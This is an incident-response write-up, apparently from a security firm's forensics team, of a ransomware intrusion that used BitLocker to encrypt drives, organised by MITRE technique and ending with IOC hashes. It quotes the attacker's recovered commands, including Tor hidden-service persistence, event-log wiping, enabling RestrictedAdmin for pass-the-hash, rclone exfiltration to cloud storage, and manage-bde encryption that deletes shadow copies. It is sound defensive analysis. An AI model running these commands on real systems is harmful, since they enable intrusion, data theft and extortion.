Verder naar navigatie Doorgaan naar hoofdinhoud Ga naar de voettekst

Nameless and shameless: Ransomware Encryption via BitLocker

Summary

Tl;dr

This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs.

Below provides a summary of findings which are presented in this blog post: Initial Access via Remote Desktop Web Access service Leveraging RDP, Tor and AnyDesk for persistence Creation of new accounts Using SMB and RDP for lateral movement Exfiltration of data via Backblaze Enabling BitLocker device encryption and holding the keys to ransom

Incident Overview

Initial access was gained via the externally facing Remote Desktop Web Access service. Upon access the threat actor conducted reconnaissance activity and deployed AnyDesk. The Windows command shell was utilised extensively to facilitate command execution and persistence was maintained via RDP, creation of new accounts and services. Data was exfiltrated using a lesser-known cloud storage provider and BitLocker was used to encrypt devices in the victim’s environment.

Timeline

T – Initial Access gained
T +2 days – Reconnaissance activity
T +3 days – Discovery activity
T +4 days – Execution of commonly used tools
T +5 days – Data exfiltration begins
T + 6 days – Further data exfiltration
T + 7 days – Device encryption using BitLocker

Mitre TTPs

Initial Access

T1133 - External Remote Services
The threat actor gained initial access via the externally facing Remote Desktop Web Access service on a gateway that brokers RDP connections into the victim’s environment, enabling the threat actor to establish an RDP session.
The first evidence of the threat actor accessing the network was from the 128.154.207[.]157 IP address; they successfully authenticated using a legitimate account. The established session enabled the threat actor to log into a host using the same account and deploy AnyDesk.
The threat actor also gained access via this remote desktop service using the same legitimate account but this time from the IP address 45.151.167[.]11. Subsequently, the threat actor logged into the remote desktop server and deployed AnyDesk and ssh.exe, as well as performing domain enumeration activities.

T1078.002 - Valid Accounts: Domain Accounts
Additionally, the threat actor leveraged valid credentials to establish RDP sessions via the remote desktop gateway.
Due to the high volume of password guessing targeting the Remote Desktop Web Access service, it is highly likely the threat actor was able to compromise the affected account credentials through a brute force password attack.

Execution

T1053 – Scheduled Task/Job

Various scheduled tasks were executed.

sc create RustDesk binpath= "\"C:\Program Files\RustDesk\RustDesk.exe\" --service" start= auto DisplayName= "RustDesk Service"

sc create Tor binPath= "C:\Programdata\Tor\tor.exe --nt-service -f C:\Programdata\Tor\torrc" start= auto

sc config sshd start= auto

T1059.001 - Command and Scripting Interpreter:PowerShell

PowerShell was also leveraged to run scripts and execute commands, mostly to perform reconnaissance across the domain.

The below script was identified. Based on the file name, it appears to enumerate Active Directory account details for all domains.

"powershell.exe" -executionpolicy bypass -file .\Get-ADUserDetailsAllDomains.ps1

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Windows command shell (cmd.exe) was utilised extensively, particularly using Impacket, which relies on cmd.exe to facilitate command execution.

The below command was almost certainly executed using Impacket:

cmD.eXE /Q /c, echo c:\programdata\tor.exe -oc:\programdata -y -p"fortnort " ^> \\127.0.0.1\ADMIN$\yk 2^>^&1 > C:\Windows\TEMP\wdfuai.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Windows\TEMP\wdfuai.bat & del C:\Windows\TEMP\wdfuai.bat

Persistence

T113 – External Remote Service

As the RD Web Access service was externally facing, the threat actor was able to establish RDP sessions into the victim’s environment.

T1078.002 – Valid Accounts: Domain Accounts

The threat actor leveraged valid credentials for a genuine account and established RDP sessions via the gateway. These RDP sessions gave the threat actor a foothold into the environment until the affected account credentials were reset.

Furthermore, a domain account named backdoor was created on one of the affected domains.

T1078.003 - Valid Accounts: Local Accounts

The threat account created local accounts named adm on three compromised servers. On each server, the account was added to the local administrator group.

T1543.003 - Create or Modify System Process: Windows Service

Various Windows services were created across multiple compromised systems to establish remote access.

The following command line was executed during system startup which enabled the threat actor to establish remote access to the hosts via a hidden Tor service.

C:\Programdata\Tor\tor.exe --nt-service -f C:\Programdata\Tor\torrc

The threat actor leveraged Tor to establish a SOCKS proxy which allowed the threat actor to access network services such as RDP and SMB on internal hosts. The SOCKS proxy configuration was recovered:

SOCKSPort 9050

DataDirectory c:\programdata\tor

ControlPort 9051

CookieAuthentication 1

HiddenServiceDir c:\programdata\tor\conf HiddenServicePort 3389 127.0.0.1:3389

HiddenServicePort 445 127.0.0.1:445

HiddenServicePort 22 127.0.0.1:22

HiddenServicePort 5985 127.0.0.1:5985

HiddenServicePort 5986 127.0.0.1:5986

This configuration instructs Tor to run a hidden service which directs any traffic received via the SOCKS proxy to specific ports on the local machine. This facilitated access to the network services actively listening on the above ports.

Additionally, a service was created to execute AnyDesk, another means to obtain access to the victim’s network.

Privilege Escalation

T1078.002 - Valid Accounts: Domain Accounts

Several high privileged domain accounts across multiple domains were compromised.

The account backdoor created by the threat actor, was assigned domain administrator privileges on one of the affected domains.

All of the domain administrator accounts had domain administrator privileges across the overlying domain forest due to the transitive trusts between sibling domains.

T1078.003 - Valid Accounts: Local Accounts

As mentioned in Persistence, the threat account created local accounts named adm on three compromised servers. On each server, the account was added to the local administrator group.

Defence Evasion

T1562.004 - Impair Defenses: Disable or Modify System Firewall

This firewall rule was added: netsh advfirewall firewall add rule name="RustDesk Service" dir=in action=allow program="C:\Program Files\RustDesk\RustDesk.exe" enable=yes

T1070 – Indicator Removal

RustDesk usage was erased by the threat actor using commands such as:

taskkill /F /IM RustDesk.exe /FI "PID ne 6824"

reg delete HKEY_CLASSES_ROOT\rustdesk /f

netsh advfirewall firewall delete rule name="RustDesk Service"

T1070.001 - Indicator Removal: Clear Windows Event Logs

"cmd.EXE" /c timeout 120 >nul && for /F "usebackq tokens=*" %1 in (`wevtutil.exe el`) DO wevtutil.exe cl "%1" && schtasks /Delete /TN "GoogleUpd" /F

The above cmd.exe command was used to clear Windows Event Logs on two servers.

T1070.004 - Indicator Removal: File Deletion

Files pertaining to the threat actor’s post exploitation activities such as reconnaissance of the internal network, were deleted to hinder forensic analysis efforts. The following files which were deleted, likely contained output from reconnaissance activities:

  • C:\ProgramData\trustdmp.txt
  • C:\ProgramData\subnets.txt
  • C:\ProgramData\ad_users.txt
  • C:\ProgramData\ad_ous.txt
  • C:\ProgramData\ad_group.txt
  • C:\ProgramData\ad_computers.txt
  • C:\ProgramData\netscan\netscan\oui.txt

Tools used by the threat actor were also deleted:

  • C:\ProgramData\Advanced_Port_Scanner_2.5.3869.exe
  • C:\ProgramData\wiztree_4_04_portable\WizTree64.exe
  • C:\ProgramData\AdFind.exe
  • C:\ProgramData\netscan\netscan\netscan.exe

T1070.006 - Indicator Removal: Timestomp

The following files were dropped by the threat actor who had changed their created timestamp to historic values.

  • C:\ProgramData\VeeamLicense.dll
  • C:\ProgramData\Veeam_ASv11_1500.lic
  • C:\ProgramData\wiztree_4_04_portable.zip
  • C:\ProgramData\libcrypto.dll
  • C:\ProgramData\ssh.exe
  • C:\ProgramData\netscan.zip
  • C:\ProgramData\7-ZipPortable_22.01.paf.exe

T1070.009 - Indicator Removal: Clear Persistence

"cmd.EXE" /c timeout 120 >nul && for /F "usebackq tokens=*" %1 in (`wevtutil.exe el`) DO wevtutil.exe cl "%1" && schtasks /Delete /TN "GoogleUpd" /F

The scheduled task GoogleUpd was deleted.

Credential Access

T1003.006 - OS Credential Dumping: DCSync

A DCSync attack involves leveraging a highly privileged domain account to initiate the replication process on a remote domain controller (DC) which results in the replication and sending NTDS.dit to a threat actor controller system. A DCSync attack was detected in the victim’s environment.

Discovery

T1087 - Account Discovery

The command net.exe accounts was executed across hosts.

T1087.002 - Account Discovery: Domain Account

The files C:\ProgramData\users.txt, ALL_Domains-Users.txt and ad_users.txt relating to domain users were identified.

T1135 - Network Share Discovery

Network shares were probed and accessed by the threat actor on multiple hosts.

T1046 - Network Service Discovery

SoftPerfect Network Scanner (Netscan) was used to conduct port scanning activities to understand what network services were actively running on hosts.

Advanced Port Scanner was also utilised to perform network scanning activity and Advanced IP Scanner was leveraged on one server.

T1018 - Remote System Discovery

Scanning was conducted to collect a list of neighbouring systems that could be targeted. Additionally, PowerView, commonly used for network and Windows domain enumeration, was leveraged by the threat actor. PowerView was disguised in the file C:\ProgramData\New Text Document.txt.

Once the PowerView module was imported, the threat actor invoked the below function to find all systems within the AD forest where the current user had local administrator privileges. The current user was the same user as the legitimate account used for initial access.

Invoke-FindLocalAdminAccess -Threads 100 -SearchForest -Verbose

T1482 - Domain Trust Discovery

The below commands were executed to collect domain trust information.

nltest.exe /domain_trusts

nltest.exe /dclist:

The output of this activity was likely contained in this file C:\ProgramData\trustdmp.txt.

T1083 - File and Directory Discovery

The disk space analyser WizTree was used to perform a full directory and file listing of the local system on two servers where data exfiltration activity occurred.

Lateral Movement

T1021.002 - Remote Services: SMB/Windows Admin Shares

SMB was leveraged to execute processes on remote hosts. The observed activity matched that of Impacket.

C:\WindOws\SyStem32\cmD.eXE /Q /c, echo c:\programdata\tor\install_service.bat ^> \\127.0.0.1\ADMIN$\ps 2^>^&1 > C:\Users\%username%\AppData\Local\Temp\swadso.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Users\%username%\AppData\Local\Temp\swadso.bat & del C:\Users\%username%\AppData\Local\Temp

T1021.001 - Remote Services: Remote Desktop Protocol

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f /d 0 /t REG_DWORD

This process was likely executed remotely via Impacket, with the RestrictedAdmin mode enabled. This mode allowed the threat actor to perform a pass-the-hash to authenticate and establish an RDP session with just the password hash of an account.

Collection

T1005 - Data from Local System

Rclone was leveraged to exfiltrate data stored on a D drive on one of the compromised hosts. It is likely the threat actor mounted virtual disks of virtual machines via a virtual machine they created. This would have allowed the threat actor to access data stored on the virtual disks via a local mount point.

One of the Rclone commands executed (see under Exfiltration) specified exclusions of files and folders with the strings "ackup", "BACKUP", "SNAPSHOT" and "napshot" to avoid exfiltrating backup and snapshot files from the target drive.

T1039 - Data from Network Shared Drive

The threat actor browsed data on remote systems via SMB. The following command was executed to browse data on the operating system drive of one host.

"explorer.exe" \\\C$

T1074.002 - Data Staged: Remote Data Staging

Data in the form of Veeam backups were staged on one host. This was achieved by installing Veeam on the host and configuring it as a backup server. The Veeam backup service was then installed on other hosts to obtain data.

Veeam was configured to perform entire computer backups, as seen below:

General ------------------------------------------

Backup job name: Agent Backup Job 3 - 10.2.0.7

Backup job description:

Source -------------------------------------------

Backup mode: entire computer

The entire computer will be backed up

Destination --------------------------------------

Veeam Agent for Microsoft Windows repository

Backup server:<SERVER NAME>

Backup repository: Object storage repository 1

Keep restore points for the last 7 days

Compression level: High

Storage optimization: 1MB (recommended)

Storage encryption: disabled

The Veeam backups were configured to use compression during the backup process. Useful Veeam logs were identified in C:\ProgramData\Veeam\Backup.

Command and Control

T1572 - Protocol Tunnelling

SSH tunnels were established to the IP address 128.254.207[.]157 from multiple compromised systems to create an encrypted channel that acted as a direct ingress point into the internal network for the threat actor.

Additionally, a hidden Tor service was utilised to tunnel RDP traffic from the threat actor to several compromised systems.

T1219 - Remote Access Software

The remote monitoring and management tools AnyDesk and RustDesk were deployed.

"cmd.exe" /C C:\Users\\AppData\Local\Temp\3458\RustDesk_install.bat

Exfiltration

T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage

Rclone was leveraged to exfiltrate data to the cloud storage provider Backblaze.

The Rclone config file was located at C:\ProgramData\rclone.conf on the host which was configured as a backup server via Veeam. The configuration specified that the targeted data would be uploaded via SMB to another host before it was uploaded to Backblaze.

The credentials supplied to facilitate the SMB data uploaded belonged to a local account created by the threat actor.

Traffic was also identified from the virtual machine created by the threat actor to Backblaze servers. During the period of this activity, 5.2 TB of data was sent to Backblaze IP addresses.

T1537 - Transfer Data to Cloud Account

The threat actor created a Backblaze account via Google Chrome on one of the compromised hosts. A temporary email address was generated via temp-mail[.]io.

T1030 - Data Transfer Size Limits

Data exfiltrated via Rclone was throttled by specifying bandwidth transfer limits as seen below:

"rclone.exe" copy D:\ b2:/test//D/ --ignore-existing --auto-confirm --multi-thread-streams 150 --transfers 150 --config c:\programdata\rclone.conf --log-file=c:\programdata\rclone9.log --exclude **napshot** --exclude **ackup** --exclude **SNAPSHOT** --exclude **BACKUP** --bwlimit "Mon-07:00,56M Mon-23:00,off Tue-07:00,56M Tue-23:00,off Wed-07:00,56M Wed-23:00,off Thu-07:00,56M Thu-23:00,off Fri-07:00,56M **********

A bandwidth limit of 56 MiB per second was incorporated into the use of Rclone to limit data exfiltration activity between the hours of 07:00 and 23:00 on working days to avoid causing any network performance issues which could have resulted in detection of this activity.

Impact

T1486 - Data Encrypted for Impact

As seen below, the threat actor used the manage-bde.exe utility to enable BitLocker device encryption across multiple systems. The associated keys were held to ransom.

manage-bde -on C: -Password ********** -UsedSpaceOnly -RemoveVolumeShadowCopies

manage-bde -on D: -Password ********** -UsedSpaceOnly -RemoveVolumeShadowCopies

Encryption impacted both the OS drives and data drives of targeted systems.

The C:\+_+_+ BITLOCKER KEYS was created. This folder contained a ransom note.

It should be noted that Microsoft Defender censored the BitLocker password from command lines so during the analysis the passwords could not be recovered. IOC List Below is a list of SHA1 and SHA2656 hashes observed during the investigation.

IOC List

Below is a list of SHA1 and SHA2656 hashes observed during the investigation.

IOC 

Description 

04f61d92f0723aadbd6410e329197b7a3d245b8a31ae5f71224946aa83ef3db8 

rustdesk-1.2.3-2-x86_64.exe 

04fca867c197ef8afd566d6c650ce8b87c413488df24ab721029806eccb74807 

AnyDesk.exe 

0c32498bd419c65565a5496cd528c11c74d5306d69e4fe29d8bfe36aa0274a92 

PAExec.exe 

18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566 

netscan.exe 

1b4ed1e4e6d3f8effb0f119056d5b06342d80524 

ssh.exe 

1c15c368e8ba7e6145a9d058517f2f0bc32e3336 

rustdesk-1.2.3-2-x86_64.exe 

1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499  

Anydesk.exe 

2b2d977e61113bbd9c160911fa62953316cc49d6a6ad95559be76ba33076e03c 

WizTree64.exe 

2c8d7ee893c1b9d4a480321e03311282817ca52dbf74f9605219365767e61a23  

Tor.exe 

419fc0cfc48f8558a16204ec3ec196e245aacddb00e963da29252e455bf0cb88 

1.bat 

45126297c07c6ef56b51440cd0dc30acf7b3b938e2e9e656334886fe2f81f220  

AnyDesk.exe 

4b8be22b23cd9098218a6f744baeb45c51b6fad6a559b01fe92dbb53c6e2c128 

AdFind.exe 

55e4ce3fe726043070ecd7de5a74b2459ea8bed19ef2a36ce7884b2ab0863047 

AnyDesk.exe 

60805858896010db0cf531135e68fbb38e50fd62  

SSH.exe 

6ae696aa26388f437e877abb4560205120c8a96da3efc6e95c8a224c7ee4dae8 

obfs4proxy.exe 

6d417e0a2ed3088786656205e105b146ddf79cf6 

wdfuai.bat 

76652508b09bae5ef7b6fcd049006d0285be99caa2008dd746a4bcd66f90aa1e  

AnyDesk.exe 

85ad9bfcd17883d99508c56e91702259c0a0cca810b0e4c6018aae6d2dffccd2 

Veeam installer (181e3c70.msi) 

89a41aee09b97bd7a965f8dd254b88fa31b0398a8d7d50415f10b2bf0aa43944 

WizTree.exe 

8a878d4c2dff7ae0ec4f20c9ddbbe40b1d6c801d07b9db04597e46b852ea2dc5 

Rclone.exe 

a0d1a4f068ed3ed585e5cec6c787521b1c0d2d64  

ssh.exe 

adf30c7f5d800abedeae4507f090dc699e9cb80464e514bd11e3d466c4c32318 

AnyDesk.exe 

b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682 

AdFind.exe 

c77496e2dbd3eeb440ff001ffc535a5ac9982dcadab0fa1cbbc1ec0a9c9b7dc9 

AnyDesk.exe 

d034d92ecdfc79741edccb803113dd7af23f5cde96b165d7449d8f7c02b7d6cb 

rclone-v1.64.2-windows-amd64.zip 

da099662090f6b6155fbc44da1b1349c8ff69f1d  

ssh.exe 

e41c537036e06a8fe49b1151b7c1684706c70b394bae99ca4d073e9e415d2918 

AnyDesk.exe 

e8111555dd2fc28660af89199f308a6533a642aef605ecebf7a6c49c0ac7d1a9  

Tor.exe 

ef57fc8f05b47f5173bdd8c12d5a3a407d74c431 

obfs4proxy.exe 

fb8fb89b5f56ce2acd9668021a470a18b7898808750800861151e908d5b1a20e 

AnyDesk.exe 

fc19f3275d02764cf249dc6fe8962e06b83a4f5769cc369bc4f77b90c567df18 

AnyDesk.exe